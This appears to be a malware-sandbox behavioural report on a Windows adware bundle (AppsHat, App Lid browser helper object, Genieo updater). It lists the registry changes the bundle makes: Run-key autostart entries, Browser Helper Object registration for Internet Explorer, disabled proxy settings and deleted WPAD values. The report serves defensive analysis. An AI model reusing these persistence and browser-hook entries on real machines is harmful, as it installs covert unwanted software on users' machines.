
To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process STab_Down_6.0.6.6.exe:3216 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "E0 D1 59 A4 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "86 83 0B D9 8E 3B D0 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process App Lid-codedownloader.exe:3672 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process App Lid-codedownloader.exe:3264 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process regsvr32.exe:3720 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
"(Default)" = ""

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "App Lid"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\0\win64]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

"NoExplorer" = "1"

The Application deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Programmable]

The process regsvr32.exe:3404 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}]
"(Default)" = "ISandBox"

[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"NoExplorer" = "1"

[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}]
"(Default)" = "ICrossriderBHO"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "App Lid"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"Version" = "1.0"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\Interface\{55555555-5555-5555-5555-550655575543}]
"(Default)" = "ICrossriderBHO"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743 Type Library"

[HKCR\Interface\{66666666-6666-6666-6666-660666576643}]
"(Default)" = "ISandBox"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"

[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\App Lid"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
"(Default)" = ""

[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"

[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"Version" = "1.0"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"

[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"

The Application deletes the following registry key(s):

[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\Programmable]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Programmable]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]

The process framework_setup.gen:1048 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo\Components\Framework\Personalization Framework]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine"

[HKCU\Software\Genieo\Components\Framework\Personalization Framework\Components]
"Main" = "1"

The Application deletes the following value(s) in system registry:
The Application disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoPlatform"

The process InstallGenieo.exe:4052 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo]
"updater_status" = "/status?day=0&partner=gim394750002"

[HKCU\Software\Genieo\Components\Updater\Genieo\Components]
"LastUpdateTime" = "2015 01 29 08 44"

[HKCU\Software\Genieo\Components\Partner]
"Main" = "1"

[HKCU\Software\Genieo]
"DisableUI" = "43"

The process InstallGenieo.exe:1660 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Genieo\Components\Updater\Genieo]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_dl" = "60"

"ieplugins_inst" = "10"

[HKCU\Software\Genieo]
"DataDir" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"framework_dl" = "300"
"jre_dl_and_install" = "600"
"framework_inst" = "1500"

[HKCU\Software\Genieo]
"set_homepage" = "0"

[HKCU\Software\Genieo\Components\Updater\Genieo]
"PrepEnv" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"firefox_ext_inst" = "10"
"trayapp_inst" = "10"

[HKCU\Software\Genieo\Components\Updater\Genieo]
"firstTime" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe"

[HKCU\Software\Genieo]
"set_searchProvider" = "0"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"firefox_ext_dl" = "60"

[HKCU\Software\Genieo]
"InstallDir" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application"

[HKCU\Software\Genieo\Components\Updater\Genieo]
"Log" = "1"

[HKCU\Software\Genieo\Components\Updater\Genieo\Components]
"Main" = "1"

[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"ieplugins_dl" = "60"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoUpdaterService" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe -wait 5"

"GenieoSystemTray" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe"

The process cscript.exe:3120 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayVersion" = "2.13"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\tray.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\uninstall.exe _?=C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"

[HKCU\Software\WebPlayer]
"AppsHat" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayName" = "AppsHat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"NoRepair" = "1"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process MsiExec.exe:3588 makes changes in the system registry.
The Application deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]

The process MsiExec.exe:1612 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"InstallTime" = "1422513973"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"ProductID" = "98"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF" = "01 00 00 00 00 00 00 00 C6 B8 35 46 8F 3B D0 01"

